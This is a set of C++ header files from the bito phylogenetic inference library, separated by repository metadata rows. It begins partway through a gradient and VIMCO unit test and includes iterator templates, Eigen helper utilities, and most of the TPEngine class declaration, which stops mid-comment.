PCSP s'|t = (012|3) | (0123|4) corresponds to 00001|11110|00010. Bitset s("000011111000110"); Bitset s_prime("000011111000010"); size_t s_idx = inst.SBNSupport().IndexerAt(s); size_t s_prime_idx = inst.SBNSupport().IndexerAt(s_prime); inst.sbn_parameters_.setZero(); inst.sbn_parameters_(s_idx) = 1; inst.sbn_parameters_(s_prime_idx) = -1; normalized_sbn_parameters_in_log = inst.sbn_parameters_; inst.ProbabilityNormalizeSBNParametersInLog(normalized_sbn_parameters_in_log); // These changes to normalized_sbn_parameters_in_log will change q(\tau) as well as // P(\tau_{\rho}) for \rho = 0123|4. First, // P(\tau_{\rho}) = 1/8 * exp(1)/(exp(1) + exp(-1)) = 0.1100996. double p_tau_rho = (1. / 8) * exp(normalized_sbn_parameters_in_log[s_idx]); // For q(\tau), we will just compute using the already tested function: double q_tau = inst.CalculateSBNProbabilities()(0); // The gradient for s|t is given by, // (1/q(\tau)) x P(\tau_{\rho}) x (1 - P(s|t)) double expected_grad_at_s = (1. / q_tau) * p_tau_rho * (1 - exp(normalized_sbn_parameters_in_log[s_idx])); // And the gradient for s'|t is given by, // (1/q(\tau)) x P(\tau_{\rho}) x (-P(s|t)) double expected_grad_at_s_prime = (1. / q_tau) * p_tau_rho * -exp(normalized_sbn_parameters_in_log[s_prime_idx]); // We're setting normalized_sbn_parameters_in_log to NaN as we would in a normal // application of GradientOfLogQ. normalized_sbn_parameters_in_log.setConstant(DOUBLE_NAN); grad_log_q = inst.GradientOfLogQ(normalized_sbn_parameters_in_log, indexer_representations.at(0)); CHECK_LT(fabs(expected_grad_at_s - grad_log_q(s_idx)), 1e-8); CHECK_LT(fabs(expected_grad_at_s_prime - grad_log_q(s_prime_idx)), 1e-8); // Now we test the gradient by doing the calculation by hand. K = 4; inst.SampleTrees(K); // Make up some numbers for log_f. EigenVectorXd log_f(K); log_f << -83, -75, -80, -79; // log_F = -74.97493 double log_F = NumericalUtils::LogSum(log_f); double elbo = log_F - log(K); // 0.0003271564 0.9752395946 0.0065711127 0.0178621362 EigenVectorXd tilde_w = (log_f.array() - log_F).exp(); // -76.36155 -77.33646 -76.36779 -76.37908 EigenVectorXd multiplicative_factors = (elbo - tilde_w.array()); EigenVectorXd expected_nabla(inst.sbn_parameters_.size()); expected_nabla.setZero(); // We now have some confidence in GradientOfLogQ(), so we just use it. auto indexer_reps = inst.MakeIndexerRepresentations(); normalized_sbn_parameters_in_log.setConstant(DOUBLE_NAN); for (size_t k = 0; k < K; k++) { grad_log_q = multiplicative_factors(k) * inst.GradientOfLogQ(normalized_sbn_parameters_in_log, indexer_reps.at(k)) .array(); expected_nabla += grad_log_q; } bool use_vimco = false; EigenVectorXd realized_nabla = inst.TopologyGradients(log_f, use_vimco); CheckVectorXdEquality(realized_nabla, expected_nabla, 1e-8); // Test for VIMCO gradient estimator. EigenVectorXd vimco_multiplicative_factors(K); vimco_multiplicative_factors << -0.04742748, 2.59553236, -0.01779887, -0.01278592; expected_nabla.setZero(); normalized_sbn_parameters_in_log.setConstant(DOUBLE_NAN); for (size_t k = 0; k < K; k++) { grad_log_q = vimco_multiplicative_factors(k) * inst.GradientOfLogQ(normalized_sbn_parameters_in_log, indexer_reps.at(k)) .array(); expected_nabla += grad_log_q; } use_vimco = true; realized_nabla = inst.TopologyGradients(log_f, use_vimco); CheckVectorXdEquality(realized_nabla, expected_nabla, 1e-8); } #endif // DOCTEST_LIBRARY_INCLUDED
30,241
C++
.h
566
47.236749
88
0.67875
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,121
sugar_iterators.hpp
phylovi_bito/src/sugar_iterators.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // Templates for building different types of iterators. #include <iostream> #include <vector> #include <tuple> // SuperIterator takes any number of iterators of the value_type and // iterates through them one-after-another. template <typename ValueType, typename... Iterators> class SuperIterator { public: SuperIterator(Iterators... iterators) : iterators_(std::make_tuple(iterators...)) {} // Define the necessary iterator operations bool operator!=(const SuperIterator& other) const { return std::apply( [this](const auto&... iters) { return (... && (iters != std::get<0>(iterators_))); }, iterators_); } void operator++() { std::apply([](auto&... iters) { (..., (++iters)); }, iterators_); } // Return the value_type directly since they are guaranteed to be the same ValueType operator*() const { return std::get<0>( std::apply([this](const auto&... iters) { return std::make_tuple(*iters...); }, iterators_)); } private: std::tuple<Iterators...> iterators_; }; // Template function to create the SuperIterator template <typename ValueType, typename... Containers> auto MakeSuperIterator(Containers&... containers) { return SuperIterator<ValueType, typename Containers::iterator...>( containers.begin()...); }
1,449
C++
.h
39
33.333333
87
0.684961
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,122
eigen_sugar.hpp
phylovi_bito/src/eigen_sugar.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // Put Eigen "common" code here. #pragma once #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wold-style-cast" #pragma GCC diagnostic ignored "-Wmaybe-uninitialized" #include <Eigen/Dense> #pragma GCC diagnostic pop #include <fstream> #include "sugar.hpp" using EigenVectorXd = Eigen::VectorXd; using EigenVectorXi = Eigen::VectorXi; using EigenMatrixXd = Eigen::Matrix<double, Eigen::Dynamic, Eigen::Dynamic, Eigen::RowMajor>; using EigenMatrixXb = Eigen::Matrix<bool, Eigen::Dynamic, Eigen::Dynamic>; using EigenVectorXdRef = Eigen::Ref<EigenVectorXd>; using EigenMatrixXdRef = Eigen::Ref<EigenMatrixXd>; using EigenConstVectorXdRef = Eigen::Ref<const EigenVectorXd>; using EigenConstMatrixXdRef = Eigen::Ref<const EigenMatrixXd>; using EigenArrayXb = Eigen::Array<bool, Eigen::Dynamic, 1>; using EigenArrayXbRef = Eigen::Ref<Eigen::Array<bool, Eigen::Dynamic, 1>>; const static Eigen::IOFormat EigenCSVFormat(Eigen::FullPrecision, Eigen::DontAlignCols, ", ", "\n"); // Write an Eigen object to a CSV file. template <class EigenType> void EigenToCSV(const std::string &file_path, EigenType eigen_object) { std::ofstream file(file_path.c_str()); file << eigen_object.format(EigenCSVFormat) << std::endl; if (file.bad()) { Failwith("Failure writing to " + file_path); } } // Convert each entry of a std::vector<T> to double using a function f and store in an // EigenVectorXd. template <typename T> EigenVectorXd EigenVectorXdOfStdVectorT(const std::vector<T> &v, const std::function<double(const T &)> &f) { EigenVectorXd results(v.size()); for (size_t i = 0; i < v.size(); ++i) { results[i] = f(v[i]); } return results; } // Initialize a new EigenVectorXd using a std::vector<double>. // See test below showing that it is indeed a new vector, not a Map. inline EigenVectorXd EigenVectorXdOfStdVectorDouble(std::vector<double> &v) { return Eigen::Map<EigenVectorXd, Eigen::Unaligned>(v.data(), v.size()); } template <typename EigenMatrix> std::string EigenMatrixToString(const EigenMatrix &mx) { std::stringstream os; os << "["; for (int i = 0; i < mx.rows(); i++) { os << "["; for (int j = 0; j < mx.cols(); j++) { os << mx(i, j) << ((j < mx.cols() - 1) ? ", " : ""); } os << "]" << ((i < mx.rows() - 1) ? ", " : "") << std::endl; } os << "]"; return os.str(); } #ifdef DOCTEST_LIBRARY_INCLUDED void CheckVectorXdEquality(double value, const EigenVectorXd v, double tolerance) { for (Eigen::Index i = 0; i < v.size(); i++) { CHECK_LT(fabs(value - v[i]), tolerance); } }; void CheckVectorXdEquality(const EigenVectorXd v1, const EigenVectorXd v2, double tolerance) { CHECK_EQ(v1.size(), v2.size()); for (Eigen::Index i = 0; i < v1.size(); i++) { double error = fabs(v1[i] - v2[i]); if (error > tolerance) { std::cerr << "CheckVectorXdEquality failed for index " << i << ": " << v1[i] << " vs " << v2[i] << std::endl; } CHECK_LT(error, tolerance); } }; // Return the maximum absolute difference between any two entries in vector. double VectorXdMaxError(const EigenVectorXd v1, const EigenVectorXd v2) { double max_error = 0.; Assert(v1.size() == v2.size(), "Cannot find max error of EigenVectorXd's of different sizes."); for (Eigen::Index i = 0; i < v1.size(); i++) { double error = fabs(v1[i] - v2[i]); if (error > max_error) { max_error = error; } } return max_error; } // Check if vectors are equal, within given tolerance for any two entries in vector. bool VectorXdEquality(const EigenVectorXd v1, const EigenVectorXd v2, double tolerance) { if (v1.size() != v2.size()) { return false; } for (Eigen::Index i = 0; i < v1.size(); i++) { double error = fabs(v1[i] - v2[i]); if (error > tolerance) { return false; } } return true; }; void CheckVectorXdEqualityAfterSorting(const EigenVectorXdRef v1, const EigenVectorXdRef v2, double tolerance) { EigenVectorXd v1_sorted = v1; EigenVectorXd v2_sorted = v2; std::sort(v1_sorted.begin(), v1_sorted.end()); std::sort(v2_sorted.begin(), v2_sorted.end()); CheckVectorXdEquality(v1_sorted, v2_sorted, tolerance); }; TEST_CASE( "Make sure that EigenVectorXdOfStdVectorDouble makes a new vector rather than " "wrapping data.") { std::vector<double> a = {1., 2., 3., 4.}; EigenVectorXd b = EigenVectorXdOfStdVectorDouble(a); a[0] = 99; CHECK_EQ(b[0], 1.); } #endif // DOCTEST_LIBRARY_INCLUDED
4,776
C++
.h
126
33.730159
87
0.66199
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,123
tp_engine.hpp
phylovi_bito/src/tp_engine.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // TPEngine uses the Top-Pruning method for evaluating the edges of the DAG. Each edge // is evaluated according to its representative "Top Tree", that is, the best scoring // tree of all possible trees contained within the DAG that include that edge. The // topology of each Top Tree is stored per edge in the choice map. Tree/edge scoring is // facilitated by the helper TPEvalEngine class. #pragma once #include "sugar.hpp" #include "gp_dag.hpp" #include "graft_dag.hpp" #include "pv_handler.hpp" #include "tp_choice_map.hpp" #include "nni_operation.hpp" #include "dag_branch_handler.hpp" #include "optimization.hpp" #include "substitution_model.hpp" #include "tp_evaluation_engine.hpp" enum class TPEvalEngineType { LikelihoodEvalEngine, ParsimonyEvalEngine }; static const inline size_t TPEvalEngineTypeCount = 2; class TPEvalEngineTypeEnum : public EnumWrapper<TPEvalEngineType, size_t, TPEvalEngineTypeCount, TPEvalEngineType::LikelihoodEvalEngine, TPEvalEngineType::ParsimonyEvalEngine> { public: static inline const std::string Prefix = "TPEvalEngineType"; static inline const Array<std::string> Labels = { {"LikelihoodEvalEngine", "ParsimonyEvalEngine"}}; static std::string ToString(const TPEvalEngineType e) { std::stringstream ss; ss << Prefix << "::" << Labels[e]; return ss.str(); } friend std::ostream &operator<<(std::ostream &os, const TPEvalEngineType e) { os << ToString(e); return os; } }; using BitsetEdgeIdMap = std::unordered_map<Bitset, EdgeId>; using BitsetBitsetMap = std::unordered_map<Bitset, Bitset>; using NNINNIMap = std::unordered_map<NNIOperation, NNIOperation>; using NNIAdjNodeIdMap = NNIAdjacentMap<std::pair<NodeId, NodeId>>; using NNIAdjBitsetEdgeIdMap = NNIAdjacentMap<std::pair<Bitset, EdgeId>>; using EdgeIdTopologyMap = std::vector<std::pair<std::set<EdgeId>, Node::Topology>>; using TreeIdTopologyMap = std::map<TreeId, std::vector<Node::Topology>>; using TreeIdTreeMap = std::map<TreeId, std::vector<RootedTree>>; class TPEngine { public: TPEngine(GPDAG &dag, SitePattern &site_pattern); TPEngine(GPDAG &dag, SitePattern &site_pattern, std::optional<std::string> mmap_likelihood_path, std::optional<std::string> mmap_parsimony_path, std::optional<const RootedTreeCollection> tree_collection = std::nullopt, std::optional<const BitsetSizeMap> edge_indexer = std::nullopt); // ** Comparators // Compares DAG and EdgeChoices. Note: only tests for equality, not a well-ordered // comparator. static int Compare(const TPEngine &lhs, const TPEngine &rhs, const bool is_quiet = true); friend bool operator==(const TPEngine &lhs, const TPEngine &rhs); // ** Access GPDAG &GetDAG() { return *dag_; } const GPDAG &GetDAG() const { return *dag_; } GraftDAG &GetGraftDAG() { return *graft_dag_; } const GraftDAG &GetGraftDAG() const { return *graft_dag_; } SitePattern &GetSitePattern() { return site_pattern_; } const SitePattern &GetSitePattern() const { return site_pattern_; } EigenVectorXd &GetSitePatternWeights() { return site_pattern_weights_; } const EigenVectorXd &GetSitePatternWeights() const { return site_pattern_weights_; } TPChoiceMap &GetChoiceMap() { return choice_map_; } const TPChoiceMap &GetChoiceMap() const { return choice_map_; } TPChoiceMap::EdgeChoice &GetChoiceMap(const EdgeId edge_id) { return GetChoiceMap().GetEdgeChoice(edge_id); } const TPChoiceMap::EdgeChoice &GetChoiceMap(const EdgeId edge_id) const { return GetChoiceMap().GetEdgeChoice(edge_id); } std::vector<TreeId> &GetTreeSource() { return tree_source_; } const std::vector<TreeId> &GetTreeSource() const { return tree_source_; } void SetTreeSource(const std::vector<TreeId> tree_source) { tree_source_ = tree_source; } TreeId &GetTreeSource(const EdgeId edge_id) { return GetTreeSource()[edge_id.value_]; } const TreeId &GetTreeSource(const EdgeId edge_id) const { return GetTreeSource()[edge_id.value_]; } // ** Counts // Node Counts size_t GetNodeCount() const { return node_count_; }; size_t GetSpareNodeCount() const { return node_spare_count_; } size_t GetAllocatedNodeCount() const { return node_alloc_; } size_t GetPaddedNodeCount() const { return GetNodeCount() + GetSpareNodeCount(); }; void SetNodeCount(const size_t node_count) { node_count_ = node_count; } void SetSpareNodeCount(const size_t node_spare_count) { node_spare_count_ = node_spare_count; } void SetAllocatedNodeCount(const size_t node_alloc) { node_alloc_ = node_alloc; } // Edge Counts size_t GetEdgeCount() const { return edge_count_; }; size_t GetSpareEdgeCount() const { return edge_spare_count_; }; size_t GetAllocatedEdgeCount() const { return edge_alloc_; }; size_t GetPaddedEdgeCount() const { return GetEdgeCount() + GetSpareEdgeCount(); }; size_t GetSpareEdgeIndex(const size_t edge_offset) const { const size_t edge_scratch_size = GetPaddedEdgeCount() - GetEdgeCount(); Assert(edge_offset < edge_scratch_size, "Requested edge_offset outside of allocated scratch space."); return edge_offset + GetEdgeCount(); } void SetEdgeCount(const size_t edge_count) { edge_count_ = edge_count; } void SetSpareEdgeCount(const size_t edge_spare_count) { edge_spare_count_ = edge_spare_count; } void SetAllocatedEdgeCount(const size_t edge_alloc) { edge_alloc_ = edge_alloc; } size_t GetSpareNodesPerNNI() const { return spare_nodes_per_nni_; } size_t GetSpareEdgesPerNNI() const { return spare_edges_per_nni_; } size_t GetInputTreeCount() const { return input_tree_count_; } TreeId GetMaxTreeId() const { return TreeId(tree_counter_); } TreeId GetNextTreeId() const { return TreeId(GetInputTreeCount()); } // ** Settings double GetResizingFactor() const; size_t IsOptimizeNewEdges() const; void SetOptimizeNewEdges(const bool do_optimize_new_edges); size_t GetOptimizationMaxIteration() const; void SetOptimizationMaxIteration(const size_t optimize_max_iter); bool GetUseBestEdgeMap() const; void SetUseBestEdgeMap(bool do_use_best_edge_map); bool IsInitProposedBranchLengthsWithDAG() const; void SetInitProposedBranchLengthsWithDAG( const bool do_init_proposed_branch_lengths_with_dag); bool IsFixProposedBranchLengthsFromDAG() const; void SetFixProposedBranchLengthsFromDAG( const bool do_fix_proposed_branch_lengths_from_dag); // ** Maintenance // Initialize engine parts: choice map, eval engine, etc. void Initialize(); // Update engine after updating the DAG. void UpdateAfterModifyingDAG( const std::map<NNIOperation, NNIOperation> &nni_to_pre_nni, const size_t prev_node_count, const Reindexer &node_reindexer, const size_t prev_edge_count, const Reindexer &edge_reindexer, bool is_quiet = true); // Resize GPEngine to accomodate DAG with given number of nodes and edges. Option // to remap data according to DAG reindexers. Option to give explicit number of // nodes or edges to allocate memory for (this is the only way memory allocation // will be decreased). void GrowNodeData(const size_t node_count, std::optional<const Reindexer> node_reindexer = std::nullopt, std::optional<const size_t> explicit_alloc = std::nullopt, const bool on_init = false); void GrowEdgeData(const size_t edge_count, std::optional<const Reindexer> edge_reindexer = std::nullopt, std::optional<const size_t> explicit_alloc = std::nullopt, const bool on_intialization = false); // Remap node and edge-based data according to reordering of DAG nodes and edges. void ReindexNodeData(const Reindexer &node_reindexer, const size_t old_node_count); void ReindexEdgeData(const Reindexer &edge_reindexer, const size_t old_edge_count); // Grow space for storing temporary computation. void GrowSpareNodeData(const size_t new_node_spare_count); void GrowSpareEdgeData(const size_t new_edge_spare_count); // Update edge and node data by copying over from pre-NNI to post-NNI. using CopyEdgeDataFunc = std::function<void(const EdgeId, const EdgeId)>; void CopyOverEdgeDataFromPreNNIToPostNNI( const NNIOperation &post_nni, const NNIOperation &pre_nni, CopyEdgeDataFunc copy_data_func, std::optional<size_t> new_tree_id = std::nullopt); // ** Choice Map // Intialize choice map naively by setting first encountered edge for each void InitializeChoiceMap(); // Update choice map after modifying DAG. void UpdateChoiceMapAfterModifyingDAG( const std::map<NNIOperation, NNIOperation> &nni_to_pre_nni, const size_t prev_node_count, const Reindexer &node_reindexer, const size_t prev_edge_count, const Reindexer &edge_reindexer); // Set tree source for each edge, by taking the first occurrence of each PCSP edge // from input trees. void SetTreeSourceByTakingFirst(const RootedTreeCollection &tree_collection, const BitsetSizeMap &edge_indexer); // Set each edge's choice map, by either: // True: the PCSP heuristic, False: the Subsplit heuristic. void SetChoiceMapByTakingFirst(const RootedTreeCollection &tree_collection, const BitsetSizeMap &edge_indexer, const bool use_subsplit_heuristic = true); // Update an individual edge's choice map using the tree source. Naively takes first // adjacent edge. void UpdateEdgeChoiceByTakingFirstTree(const EdgeId edge_id); // Update an individual edge's choice map using the tree source. Trees added to the // DAG first recieve highest priority. void UpdateEdgeChoiceByTakingHighestPriorityTree(const EdgeId edge_id); // Update an individual edge's choice map using the tree source. Examines all // available edge combinations an takes adjacent edge that results in max score. void UpdateEdgeChoiceByTakingHighestScoringTree(const EdgeId edge_id); // ** Proposed NNIs // Get highest priority pre-NNI in DAG for given post-NNI. NNIOperation FindHighestPriorityNeighborNNIInDAG(const NNIOperation &nni) const; std::tuple<EdgeId, EdgeId, EdgeId> FindHighestPriorityAdjacentNodeId( const NodeId node_id) const; // Builds a map of adjacent edges from pre-NNI to post-NNI. std::unordered_map<EdgeId, EdgeId> BuildAdjacentEdgeMapFromPostNNIToPreNNI( const NNIOperation &pre_nni, const NNIOperation &post_nni) const; // Map edge ids in pre-NNI edge choice according to the swap in post-NNI clade map. TPChoiceMap::EdgeChoice RemapEdgeChoiceFromPreNNIToPostNNI( const TPChoiceMap::EdgeChoice &pre_choice, const NNIOperation::NNICladeArray &clade_map) const; // Create remapped edge choices from pre-NNI to post-NNI. TPChoiceMap::EdgeChoice GetRemappedEdgeChoiceFromPreNNIToPostNNI( const NNIOperation &pre_nni, const NNIOperation &post_nni) const; // Get the average of the edges below parent and above child. double GetAvgLengthOfAdjEdges( const NodeId parent_node_id, const NodeId child_node_id, const std::optional<size_t> prev_node_count = std::nullopt, const std::optional<Reindexer> node_reindexer = std::nullopt, const std::optional<size_t> prev_edge_count = std::nullopt, const std::optional<Reindexer> edge_reindexer = std::nullopt) const; // Build map from new NNIs to best pre-existing neighbor NNI in DAG. NNINNIMap BuildMapOfProposedNNIsToBestPreNNIs(const NNISet &post_nnis) const; // Build map from new NNI's pcsp bitsets to best reference pre-NNI's edge in DAG. // Creates map entry for grandparent, sister, left_child, and right_child of each NNI, BitsetEdgeIdMap BuildMapOfProposedNNIPCSPsToBestPreNNIEdges( const NNISet &post_nnis, std::optional<const size_t> prev_edge_count = std::nullopt, std::optional<const Reindexer> edge_reindexer = std::nullopt) const; // Build map above, but storing edges as PCSPs. BitsetBitsetMap BuildMapOfProposedNNIPCSPsToBestPreNNIPCSPs( const NNISet &post_nnis, std::optional<const size_t> prev_edge_count = std::nullopt, std::optional<const Reindexer> edge_reindexer = std::nullopt) const; // Build map from post-NNI PCSP to pre-NNI edge_id. NNIAdjBitsetEdgeIdMap BuildAdjacentPCSPsFromPreNNIToPostNNI( const NNIOperation &pre_nni, const NNIOperation &post_nni) const; // Build node_id map from pre-NNI to post-NNI. TPChoiceMap::EdgeChoiceNodeIdMap BuildAdjacentNodeIdMapFromPreNNIToPostNNI( const NNIOperation &pre_nni, const NNIOperation &post_nni) const; // Build PCSP map from pre-NNI to post-NNI. TPChoiceMap::EdgeChoicePCSPMap BuildAdjacentPCSPMapFromPreNNIToPostNNI( const NNIOperation &pre_nni, const NNIOperation &post_nni) const; // Build map from edge PCSPs to vector of edge choice PCSPs. using PCSPToPCSPsMap = std::map<Bitset, std::vector<Bitset>>; PCSPToPCSPsMap BuildMapFromPCSPToEdgeChoicePCSPs() const; // Build map from edge PCSPs to their PV Hashes. using PCSPToPVHashesMap = std::map<Bitset, std::vector<std::string>>; PCSPToPVHashesMap BuildMapFromPCSPToPVHashes() const; // Build map from edge PCSPs to their PV Values. using PCSPToPVValuesMap = std::map<Bitset, std::vector<DoubleVector>>; PCSPToPVValuesMap BuildMapFromPCSPToPVValues() const; // Build map from edge PCSPs to their branch length. using PCSPToBranchLengthMap = std::map<Bitset, double>; PCSPToBranchLengthMap BuildMapFromPCSPToBranchLength() const; // Build map from edge PCSPs to their top tree score. using PCSPToScoreMap = std::map<Bitset, double>; PCSPToScoreMap BuildMapFromPCSPToScore(const bool recompute_scores); // ** TP Evaluation Engine // Get current in use evaluation engine. TPEvalEngine &GetEvalEngine() { return *eval_engine_; } const TPEvalEngine &GetEvalEngine() const { return *eval_engine_; } // Set evaluation engine type for use in runner. void SelectEvalEngine(const TPEvalEngineType eval_engine_type); // Remove all evaluation engines from use. void ClearEvalEngineInUse(); // Check if evaluation engine is currently in use. bool IsEvalEngineInUse(const TPEvalEngineType eval_engine_type) const { return eval_engine_in_use_[eval_engine_type]; } // Update PVs after modifying the DAG. void UpdateEvalEngineAfterModifyingDAG( const std::map<NNIOperation, NNIOperation> &nni_to_pre_nni, const size_t prev_node_count, const Reindexer &node_reindexer, const size_t prev_edge_count, const Reindexer &edge_reindexer); // ** TP Evaluation Engine - Likelihood void MakeLikelihoodEvalEngine(const std::string &mmap_likelihood_path); TPEvalEngineViaLikelihood &GetLikelihoodEvalEngine() { return *likelihood_engine_; } const TPEvalEngineViaLikelihood &GetLikelihoodEvalEngine() const { return *likelihood_engine_; } bool HasLikelihoodEvalEngine() const { return likelihood_engine_ != nullptr; } void SelectLikelihoodEvalEngine(); EigenConstMatrixXdRef GetLikelihoodMatrix() { Assert(HasLikelihoodEvalEngine(), "Must MakeLikelihoodEvalEngine before access."); auto &log_likelihoods = GetLikelihoodEvalEngine().GetDAGBranchHandler().GetBranchLengthData(); return log_likelihoods.block(0, 0, GetEdgeCount(), log_likelihoods.cols()); } const PLVEdgeHandler &GetLikelihoodPVs() const { Assert(HasLikelihoodEvalEngine(), "Must MakeLikelihoodEvalEngine before access."); return GetLikelihoodEvalEngine().GetPVs(); } const EigenVectorXd &GetTopTreeLikelihoods() const { Assert(HasLikelihoodEvalEngine(), "Must MakeLikelihoodEvalEngine before access."); return GetLikelihoodEvalEngine().GetTopTreeScores(); } // ** TP Evaluation Engine - Parsimony void MakeParsimonyEvalEngine(const std::string &mmap_parsimony_path); TPEvalEngineViaParsimony &GetParsimonyEvalEngine() { return *parsimony_engine_; } const TPEvalEngineViaParsimony &GetParsimonyEvalEngine() const { return *parsimony_engine_; } bool HasParsimonyEvalEngine() const { return parsimony_engine_ != nullptr; } void SelectParsimonyEvalEngine(); const PSVEdgeHandler &GetParsimonyPVs() const { Assert(HasParsimonyEvalEngine(), "Must MakeParsimonyEvalEngine before access."); return GetParsimonyEvalEngine().GetPVs(); } const EigenVectorXd &GetTopTreeParsimonies() const { Assert(HasParsimonyEvalEngine(), "Must MakeParsimonyEvalEngine before access."); return GetParsimonyEvalEngine().GetTopTreeScores(); } // ** TP Evaluation Engine - Branch Lengths const EigenVectorXd &GetBranchLengths() const { if (HasLikelihoodEvalEngine()) { return GetLikelihoodEvalEngine().GetDAGBranchHandler().GetBranchLengthData(); } Failwith("EvalEngine Type does not have branch lengths."); } DAGBranchHandler &GetDAGBranchHandler() { if (HasLikelihoodEvalEngine()) { return GetLikelihoodEvalEngine().GetDAGBranchHandler(); } Failwith("EvalEngine Type does not have branch lengths."); } const DAGBranchHandler &GetDAGBranchHandler() const { if (HasLikelihoodEvalEngine()) { return GetLikelihoodEvalEngine().GetDAGBranchHandler(); } Failwith("EvalEngine Type does not have branch lengths."); } // Set branch lengths from vector. void SetBranchLengths(EigenVectorXd new_branch_lengths) { GetDAGBranchHandler().SetBranchLengths(new_branch_lengths); } // Set branch lengths to default. void SetBranchLengthsToDefault(); // Set branch lengths by taking the first occurrance of each PCSP edge from // tree collection (requires likelihood evaluation engine). void SetBranchLengthsByTakingFirst(const RootedTreeCollection &tree_collection, const BitsetSizeMap &edge_indexer, const bool set_uninitialized_to_default = false); // Find optimized branch lengths. void OptimizeBranchLengths( std::optional<bool> check_branch_convergence = std::nullopt); // ** Scoring // Get score of top-scoring tree in DAG containing given edge. double GetTopTreeScore(const EdgeId edge_id) const { return GetEvalEngine().GetTopTreeScoreWithEdge(edge_id); } // Get likelihood of top-scoring tree in DAG containing given edge. double GetTopTreeLikelihood(const EdgeId edge_id) const { Assert(HasLikelihoodEvalEngine(), "Must MakeLikelihoodEvalEngine before access."); return GetLikelihoodEvalEngine().GetTopTreeScoreWithEdge(edge_id); } // Get parsimony of top-scoring tree in DAG containing given edge. double GetTopTreeParsimony(const EdgeId edge_id) const { Assert(HasParsimonyEvalEngine(), "Must MakeParsimonyEvalEngine before access."); return GetParsimonyEvalEngine().GetTopTreeScoreWithEdge(edge_id); } // Get the Top Tree from the DAG containing the proposed NNI. double GetTopTreeScoreWithProposedNNI( const NNIOperation &post_nni, const NNIOperation &pre_nni, const size_t spare_offset = 0, std::optional<BitsetEdgeIdMap> best_edge_map_opt = std::nullopt); // Initialize EvalEngine. void InitializeScores(); // Final Score Computation after Initialization or Update. void ComputeScores(); // Update the EvalEngine after adding Node Pairs to the DAG. void UpdateScoresAfterDAGAddNodePair(const NNIOperation &post_nni, const NNIOperation &pre_nni, std::optional<size_t> new_tree_id); // ** Tree/Topology Builder // Get top-scoring topology in DAG containing given edge. Node::Topology GetTopTopologyWithEdge(const EdgeId edge_id) const; // Get top-scoring tree in DAG containing given edge. RootedTree GetTopTreeWithEdge(const EdgeId edge_id) const; // Get resulting top-scoring tree containing proposed NNI. RootedTree GetTopTreeProposedWithNNI(const NNIOperation &nni) const; // Get resulting top-scoring topology with proposed NNI. Node::Topology GetTopTreeTopologyProposedWithNNI(const NNIOperation &nni) const; // Build the set of edge_ids in DAG that represent the embedded top tree. std::set<EdgeId> BuildSetOfEdgesRepresentingTopology( const Node::Topology &topology) const; // Find the top tree's TreeId using the given edge id representation of the tree in // the DAG. std::set<TreeId> FindTreeIdsInTreeEdgeVector(const std::set<EdgeId> edge_ids) const; // Use branch lengths to build tree from a topology that is contained in the DAG. RootedTree BuildTreeFromTopologyInDAG(const Node::Topology &topology) const; // Build map containing all unique top tree topologies. Matched against all an // edge_id which results in given top tree. EdgeIdTopologyMap BuildMapOfEdgeIdToTopTopologies() const; // Build map containing all unique top tree topologies. Matched against tree_id, // which ranks trees according to input ordering into the DAG. TreeIdTopologyMap BuildMapOfTreeIdToTopTopologies() const; // Build map containing all unique top trees. Matched against tree_id, which ranks // trees according to input ordering into the DAG. TreeIdTreeMap BuildMapOfTreeIdToTopTrees() const; // Output TPEngine DAG as a newick of top trees, ordered by priority. std::string ToNewickOfTopTopologies() const; std::string ToNewickOfTopTrees() const; // Build PCSPs for all edges adjacent to proposed NNI. TPChoiceMap::EdgeChoicePCSPs BuildAdjacentPCSPsToProposedNNI( const NNIOperation &nni, const TPChoiceMap::EdgeChoiceNodeIds &adj_node_ids) const; // ** I/O std::string LikelihoodPVToString(const PVId pv_id) const; std::string LogLikelihoodMatrixToString() const; std::string ParsimonyPVToString(const PVId pv_id) const; std::string ChoiceMapToString() const { return GetChoiceMap().ToString(); }; std::string TreeSourceToString() const; protected: // ** Choice Map Helpers // Find the edge from the highest priority tree that is adjacent to given node in // the given direction. // Accomplished by iterating over all adjacent edges using tree_source_ edge // map, which gives the best tree id using a given edge. The best tree is // expected to be the earliest found in the tree collection, aka smallest // tree id. The adjacent edge that comes from the best tree is chosen. EdgeId FindHighestPriorityEdgeAdjacentToNode(const NodeId node_id, const Direction direction) const; EdgeId FindHighestPriorityEdgeAdjacentToNode(const NodeId node_id, const Direction direction, const SubsplitClade clade) const; protected: // ChoiceMap for find top-scoring tree containing any given branch. TPChoiceMap choice_map_; // Tree id where branch_length and choice_map is sourced. Also function as a edge // priority in terms of score: lower tree_id trees should have better scores. std::vector<TreeId> tree_source_; // Total number of trees used to construct the DAG. size_t input_tree_count_ = 0; // The number of top trees in DAG. size_t tree_counter_ = 0; // Map of tree ids to topologies. The tree id gives the ranking of the best // scoring of inserted trees into the DAG. std::map<TreeId, Node::Topology> tree_id_map_; std::map<TreeId, double> tree_score_map_; // Leaf labels. SitePattern site_pattern_; EigenVectorXd site_pattern_weights_; size_t spare_nodes_per_nni_ = 15; size_t spare_edges_per_nni_ = 6; // Total number of nodes in DAG. Determines sizes of data vectors indexed on // nodes. size_t node_count_ = 0; size_t node_alloc_ = 0; size_t node_spare_count_ = spare_nodes_per_nni_; // Total number of edges in DAG. Determines sizes of data vectors indexed on edges. size_t edge_count_ = 0; size_t edge_alloc_ = 0; size_t edge_spare_count_ = spare_nodes_per_nni_; // Growth factor when reallocating data. constexpr static double resizing_factor_ = 2.0; // Un-owned reference to DAG. GPDAG *dag_ = nullptr; // Un-owned reference to GraftDAG. GraftDAG *graft_dag_ = nullptr; // Map that tracks the optimal edge to reference for each individual edge. // BitsetEdgeIdMap best_edge_map_; // Use best edge map for scoring NNIs. bool do_use_best_edge_map_ = true; // A map showing which Evaluation Engines are "in use". Several engines may be // 